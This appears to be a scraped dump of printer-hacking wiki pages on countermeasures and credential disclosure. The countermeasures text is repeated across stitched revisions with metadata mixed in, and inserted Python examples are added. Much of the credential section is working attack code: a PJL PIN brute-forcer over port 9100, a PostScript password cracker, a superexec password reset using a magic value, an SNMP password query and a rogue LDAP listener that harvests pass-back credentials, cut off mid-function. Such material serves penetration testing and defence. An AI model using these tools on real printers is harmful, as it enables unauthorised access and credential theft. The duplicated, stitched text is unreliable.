The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices, and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example, the window of vulnerability can be limited to a local attacker if firmware updates require a confirmation key press on the printer's control panel. Further approaches that do not rely on code signing, such as unique per-device default passwords, can be adopted from best practices in the world of home routers.

== Admins ==

Network administrators should never leave their printers accessible from the Internet and should disable raw port 9100/tcp printing if it is not required. While this does not prevent most of the presented attacks, it complicates them and in particular limits the attacker's ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices in a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN] that is only accessible by a hardened print server. The print server should drop PJL commands entirely, convert PostScript code to another page description language or to a ‘defused’ version using Ghostscript's ''ps2write'' device as used by CUPS, and disallow access to raw print queues. Isolating the printers from the rest of the network in this way also mitigates the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below:

[[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasure to sandbox printers]]

Most attacks are based on malicious print jobs. If the device supports authentication, it should therefore be configured to accept print jobs from authorized personnel only.
Furthermore, if supported by the device, strong passwords should be set for the PostScript ''startjob'' and system parameters, the PJL disk lock and the control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript, which offers various code obfuscation techniques.

== Users ==

Employees should be trained to never leave the copy room unlocked and to report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator, as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shredded, even if they apparently do not contain confidential data.
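Two of the print-server measures from the Admins section above, dropping PJL from incoming jobs and the limits of signature-based filtering of PostScript, as an added example that is neither CUPS code nor part of the original page. The sample job, the three PostScript snippets and the single <code>startjob</code> signature are constructed for this example; a real IDS rule set would be larger, but the point, that PostScript can spell the same operator name in many ways, does not change.

```python
"""Added example (not CUPS code and not from the original page): strip PJL
from a print job before forwarding it, and show why a signature match on
the remaining PostScript is unreliable.  All sample jobs are constructed."""
import re

UEL = b"\x1b%-12345X"          # Universal Exit Language: brackets every PJL section
PJL_LINE = re.compile(rb"^@PJL\b[^\r\n]*\r?\n?", re.MULTILINE)


def strip_pjl(job: bytes) -> bytes:
    """Remove every UEL sequence and every line that starts with @PJL.
    What remains is the page description part (PostScript, PCL, ...)
    which the print server may then convert or filter further."""
    return PJL_LINE.sub(b"", job.replace(UEL, b""))


def contains_pjl(job: bytes) -> bool:
    return UEL in job or PJL_LINE.search(job) is not None


def language_of(job: bytes) -> str:
    """Sniff the page description language of a PJL-free job by its magic."""
    if job.startswith(b"%!"):
        return "postscript"
    if job.startswith(b"\x1bE") or b"\x1b*" in job[:64]:
        return "pcl"
    return "unknown"


# Signature of the kind an IDS might use to catch PostScript that tries to
# enter the privileged 'startjob' context (assumed for this example).
STARTJOB_SIG = re.compile(rb"startjob")


def signature_hit(ps: bytes) -> bool:
    return STARTJOB_SIG.search(ps) is not None


HEX_STRING = re.compile(rb"<([0-9A-Fa-f\s]*)>")


def canonicalize(ps: bytes) -> bytes:
    """Rewrite PostScript hex string literals <...> as plain (...) strings
    so that a signature sees their contents.  This catches exactly one
    spelling; octal escapes, run-time string building and the other
    obfuscations PostScript offers are left untouched."""
    def repl(match):
        digits = re.sub(rb"\s", b"", match.group(1))
        if len(digits) % 2:           # PostScript pads an odd final digit with 0
            digits += b"0"
        return b"(" + bytes.fromhex(digits.decode("ascii")) + b")"
    return HEX_STRING.sub(repl, ps)


# Constructed job: PJL header, PostScript body, PJL trailer.
SAMPLE_JOB = (
    UEL + b'@PJL JOB NAME="report"\n'
    b"@PJL SET COPIES=1\n"
    b"@PJL ENTER LANGUAGE=POSTSCRIPT\n"
    b"%!PS-Adobe-3.0\n"
    b"/Helvetica findfont 12 scalefont setfont\n"
    b"72 720 moveto (hello) show showpage\n"
    + UEL + b"@PJL EOJ\n" + UEL
)

# Three constructed PostScript bodies that all call the same privileged
# operator: spelled out, as a hex string converted to a name at run time,
# and with an octal escape inside an ordinary string literal.
PLAIN_PS = b"%!PS\ntrue (secret) startjob pop\n"
HEX_PS = b"%!PS\ntrue (secret) <73746172746a6f62> cvn cvx exec pop\n"
OCTAL_PS = b"%!PS\ntrue (secret) (s\\164artjob) cvn cvx exec pop\n"


if __name__ == "__main__":
    body = strip_pjl(SAMPLE_JOB)
    print(language_of(body), "job, PJL left:", contains_pjl(body))
    for name, ps in (("plain", PLAIN_PS), ("hex", HEX_PS), ("octal", OCTAL_PS)):
        print(f"{name:6} raw hit={signature_hit(ps)!s:5} "
              f"after canonicalize={signature_hit(canonicalize(ps))}")
```

Stripping PJL is a tractable filter because PJL has a fixed, line-oriented syntax: every command starts with <code>@PJL</code> and the language is bracketed by UEL. PostScript has no such property. The hex-string variant is caught only after the filter learns to decode hex strings, the octal-escape variant is still missed, and <code>cvn cvx exec</code> is just one of several ways to build an operator name at run time, which is why the page recommends converting PostScript with ''ps2write'' instead of trying to recognise dangerous code by signature.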
Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. 
== Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Most attacks are based on malicious print jobs. If the device supports authentication, it therefore should be configured to accept print jobs from authorized personnel only. Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. 
== Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- 1e9da8a09a22023536565f41a3eac246059e5034 310 268 2017-01-31T08:25:20Z 84.153.135.37 0 /* Vendors */ wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. 
When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. 
The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- 69fe9e899e17b46131d900a8331812ac89a4cc39 268 139 2017-01-28T15:28:54Z Admin 1 wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. 
Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. 
The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. 
Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript, which offers various code obfuscation techniques.

== Users ==

Employees should be trained to never leave the copy room unlocked and to report suspicious printouts, like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers, to the administrator, as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shredded, even if they apparently do not contain confidential data.
Credential disclosure 0 34 649 608 2017-11-22T12:01:29Z Admin 1 wikitext text/x-wiki

Printers are commonly deployed with a default password or with no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model-specific password disclosure.

== Brute-Force Attacks ==

Besides credentials leaked from sources like the [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited password protection mechanisms themselves. Breaking such mechanisms has priority in this wiki because it focuses on printer-specific weaknesses.
Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model, they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or even know about these passwords, if enabled they can prevent some of the attacks discussed in this wiki. Attackers therefore have a motivation to crack or bypass them if necessary.

=== PJL ===

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>:

<syntaxhighlight lang=text>
@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON
</syntaxhighlight>

PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size, as demonstrated by FX and FtR <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref>, who were able to unlock the disk protection within 6 hours in the worst case. PJL interpreters have gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65,535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, so cracking times have decreased considerably. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second, leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, an actual disk lock and/or control panel lock is only supported by few printers.
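The brute-force attack against PJL passwords as an added Python example; this is neither PRET's code nor part of the original page. It builds the blind variant, a single job chaining one <code>@PJL JOB PASSWORD=…</code> / <code>@PJL DEFAULT …</code> pair per candidate PIN so that the whole 16 bit key space travels in one print job, and the online variant that queries the device after each guess with <code>@PJL DINQUIRE PASSWORD</code>. Assumptions not taken from this page: the UEL framing and CRLF line endings, the semantics that DEFAULT commands after a JOB with a wrong PASSWORD are ignored while a correct PASSWORD (or PASSWORD=0 when no PIN is set) lets them through, and the reply format of DINQUIRE (command echoed, then ENABLED or DISABLED, then a form feed), all as described in the HP PJL reference. Hostnames are placeholders.

```python
import re
import socket

UEL = b"\x1b%-12345X"   # Universal Exit Language: puts the printer into PJL mode

# One JOB/EOJ pair per candidate PIN. Assumption (HP PJL reference): DEFAULT commands
# following a JOB whose PASSWORD is wrong are ignored, a correct PASSWORD lets them
# through, and PASSWORD=0 disables the PIN altogether.
_UNLOCK_TEMPLATE = (b"@PJL JOB PASSWORD=%d\r\n"
                    b"@PJL DEFAULT PASSWORD=0\r\n"
                    b"@PJL DEFAULT DISKLOCK=OFF\r\n"
                    b"@PJL DEFAULT CPLOCK=OFF\r\n"
                    b"@PJL EOJ\r\n")


def pjl_unlock_job(pins=range(1, 65536)):
    """Blind variant: a single job carrying the whole 16 bit key space.

    No reply from the device is needed, so it also works over one-way channels
    such as cross-site printing; the price is a job of several megabytes."""
    return UEL + b"".join(_UNLOCK_TEMPLATE % pin for pin in pins) + UEL


def pjl_probe_job(pin):
    """Online variant: one guess, followed by a query of the current PIN state."""
    return (UEL + b"@PJL JOB PASSWORD=%d\r\n@PJL DEFAULT PASSWORD=0\r\n"
            b"@PJL DINQUIRE PASSWORD\r\n@PJL EOJ\r\n" % pin + UEL)


def pin_protection_state(reply):
    """Parse the answer to '@PJL DINQUIRE PASSWORD' (assumed format: the command
    echoed, then ENABLED or DISABLED on the next line, then a form feed)."""
    m = re.search(rb"@PJL DINQUIRE PASSWORD\r?\n(ENABLED|DISABLED)", reply)
    return m.group(1).decode() if m else None


def send_job(host, job, port=9100, timeout=5.0):
    """Deliver a job over raw port 9100 and return whatever the device sends back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(job)
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass                              # printers rarely close the connection
    return b"".join(chunks)


def crack_pin_online(host, pins=range(1, 65536)):
    """Feedback-based cracking: stop at the first PIN that turns protection off.

    The state is checked first so that a device without any PIN is not reported
    as 'cracked with PIN 1'. At the 50 to 1,000 guesses per second reported
    above this takes between seconds and a few minutes."""
    state_query = UEL + b"@PJL DINQUIRE PASSWORD\r\n" + UEL
    if pin_protection_state(send_job(host, state_query)) != "ENABLED":
        return 0                              # no PIN set (or locking unsupported)
    for pin in pins:
        if pin_protection_state(send_job(host, pjl_probe_job(pin))) == "DISABLED":
            return pin
    return None
```

Usage: <code>send_job("printer", pjl_unlock_job())</code> delivers the blind job (no reply is evaluated), <code>crack_pin_online("printer")</code> returns the PIN once the device reports DISABLED. Note that both variants actually remove the PIN as a side effect of the successful guess, which is exactly what the attacker wants but should be kept in mind when testing a production device.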
On printers that accept a PJL password but implement neither lock, it is unclear whether the password has any undocumented, proprietary effects or is just a dummy variable. Furthermore, in violation of the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.

'''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:

<syntaxhighlight lang=text>
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection:  ENABLED
Panel lock:      ON
Disk lock:       ON
printer:/> unlock
No PIN given, cracking.
PIN protection:  DISABLED
Panel lock:      OFF
Disk lock:       OFF
</syntaxhighlight>

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65,535 possible combinations in a single print job.

=== PostScript ===

PostScript offers two types of passwords: the ''SystemParamsPassword'' is required to change persistent system parameters (such as job timeouts) via ''setsystemparams'', while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator, which takes either an integer or a string as input, checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key space is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,535 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>, which theoretically allows passwords of 524,280 bits.
On the positive side (from an attacker's point of view), brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
% candidate range (integers only)
/min 0 def
/max 1000000 def
statusdict begin
{
  % checkpassword leaves true for the current password; print it and stop
  min 1 max {
    dup checkpassword {== flush stop} {pop} ifelse
  } for
} stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates are possible because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are an exception: ''BR-Script'' only accepts one password per second, but it also checks only the very first character of the password, which effectively limits the key space to 256 possibilities, i.e. 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all.

Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code in ''superexec'' allows an attacker to ignore various protection mechanisms of the language which would normally raise an ''invalidaccess'' error.
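The self-cracking approach above, generalized from integers to string candidates, as an added Python example that is neither PRET's code nor part of the original page. It builds the PostScript job, escapes candidate strings so that parentheses or backslashes in a wordlist cannot break out of the literal, tags a hit with a <code>PW=</code> marker so it can be picked out of the interpreter's reply, and also emits the ''superexec'' reset discussed above using the magic ''internaldict'' password. It assumes that ''checkpassword'' is reachable after <code>statusdict begin</code>, as in the cracker above; the job is delivered over raw port 9100 with any sender that reads the reply. The wordlist and the replies in the usage note are constructed.

```python
import re


def ps_string(data):
    """Encode bytes as a PostScript literal string (PLRM 3rd ed., section 3.2.2):
    '(', ')' and '\\' are backslash-escaped, non-printables become octal escapes."""
    out = []
    for b in data:
        if b in b"()\\":
            out.append("\\" + chr(b))
        elif 32 <= b < 127:
            out.append(chr(b))
        else:
            out.append("\\%03o" % b)          # e.g. newline -> \012
    return "(" + "".join(out) + ")"


def build_ps_cracker_job(candidates=(), int_max=1000000):
    """PostScript job that tries string candidates first, then integers 0..int_max.

    /try is defined in userdict before 'statusdict begin' (statusdict may be
    read-only); checkpassword is still found at run time because statusdict is on
    the dictionary stack. On a hit the job prints a PW= marker and 'stop' unwinds
    to the enclosing 'stopped', so at most one password is ever printed."""
    tries = " ".join(ps_string(c.encode() if isinstance(c, str) else c) + " try"
                     for c in candidates)
    header = ("%!PS\n"
              "/try { dup checkpassword {(PW=) print == flush stop} {pop} ifelse } def\n"
              "statusdict begin\n")
    loop = "0 1 " + str(int_max) + " { try } for"
    body = ("{ " + (tries + " " if tries else "") + loop + " } stopped pop\n"
            "end\n"
            "(DONE) print flush\n")
    return (header + body).encode()


def build_ps_bypass_job(new_password="0"):
    """Reset both passwords without knowing the current ones, via superexec.
    1183615869 is the static internaldict password documented by Lancaster."""
    pw = ps_string(new_password.encode())
    return ("%!PS\n"
            "{ << /SystemParamsPassword " + pw + " /StartJobPassword " + pw +
            " >> setsystemparams } 1183615869 internaldict /superexec get exec\n").encode()


def parse_ps_result(reply):
    """Return the cracked password from the interpreter's reply: an int for integer
    hits, bytes for string hits (escapes added by == are undone), None if no hit."""
    m = re.search(rb"PW=(\((?:\\.|[^\\)])*\)|-?\d+)", reply)
    if not m:
        return None
    token = m.group(1)
    if token.startswith(b"("):
        return re.sub(rb"\\([()\\])", rb"\1", token[1:-1])
    return int(token)
```

Usage: send <code>build_ps_cracker_job(["S0me_Re4lly_g00d_Passw0rd!", "admin"], 65535)</code> to port 9100 and pass the collected reply to <code>parse_ps_result</code>; a constructed reply such as <code>b"PW=999\nDONE"</code> yields <code>999</code>, <code>b"PW=(admin)\nDONE"</code> yields <code>b"admin"</code>, and a reply ending in <code>DONE</code> without a marker means no candidate matched. A string candidate and its integer counterpart are distinct passwords in PostScript, so a wordlist should carry the value in the form it was set.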
Wrapped in ''superexec'', ''setsystemparams'' can be used to set PostScript passwords without submitting the current password first, as shown below:

<syntaxhighlight lang=postscript>
% reset both passwords to 0 without knowing the current ones
{
  << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec
</syntaxhighlight>

'''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic:

<syntaxhighlight lang=text>
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0
</syntaxhighlight>

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking the password and resetting it within a single print job.

== Password Disclosure ==

=== SNMP ===

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.
'''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpget'' tool can be used as shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
</syntaxhighlight>

Vulnerable devices return the password as a hex string (here: ''AAA''), while newer devices only respond with zero bytes.

'''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device.

=== Pass-Back ===

Another interesting class of attacks are pass-back attacks, where ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, then whenever someone (for example, the attacker herself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may harm more than the device itself once it is integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.

'''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.

'''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server.
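The rogue server side of the pass-back attack described above, as an added Python example that is neither part of the original page nor of the cited paper. An MFP configured for LDAP authentication sends an LDAPv3 simple bind, which carries the stored service account DN and password in clear (RFC 4511, section 4.2). The listener below decodes just enough BER to pull both out of the first message, answers with a successful BindResponse so the MFP does not flag an error, and ignores anything that is not a simple bind (e.g. SASL binds, whose credentials are not sent in clear). The DN and password in the test, and the hostnames, are constructed; nothing here is taken from a real device.

```python
import socket

# Minimal BER helpers: only what an LDAPv3 simple bind needs (RFC 4511, section 4.2).

def _tlv(tag, value):
    """Encode one BER TLV with a definite length (short or long form)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    length = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + value


def _int(n):
    """BER INTEGER content octets for a non-negative n (a leading 0x00 keeps it positive)."""
    return n.to_bytes((n.bit_length() + 8) // 8, "big")


def _read_tlv(buf, pos):
    """Decode the TLV starting at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                         # long form: the next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(packet):
    """Extract (message_id, version, dn, password) from an LDAP simple BindRequest.

    Returns None for anything else (SASL binds, searches, truncated data), so the
    listener never mistakes other traffic for leaked credentials."""
    try:
        tag, msg, _ = _read_tlv(packet, 0)
        if tag != 0x30:                       # LDAPMessage ::= SEQUENCE
            return None
        _, mid, pos = _read_tlv(msg, 0)       # messageID INTEGER
        tag, op, _ = _read_tlv(msg, pos)
        if tag != 0x60:                       # BindRequest ::= [APPLICATION 0]
            return None
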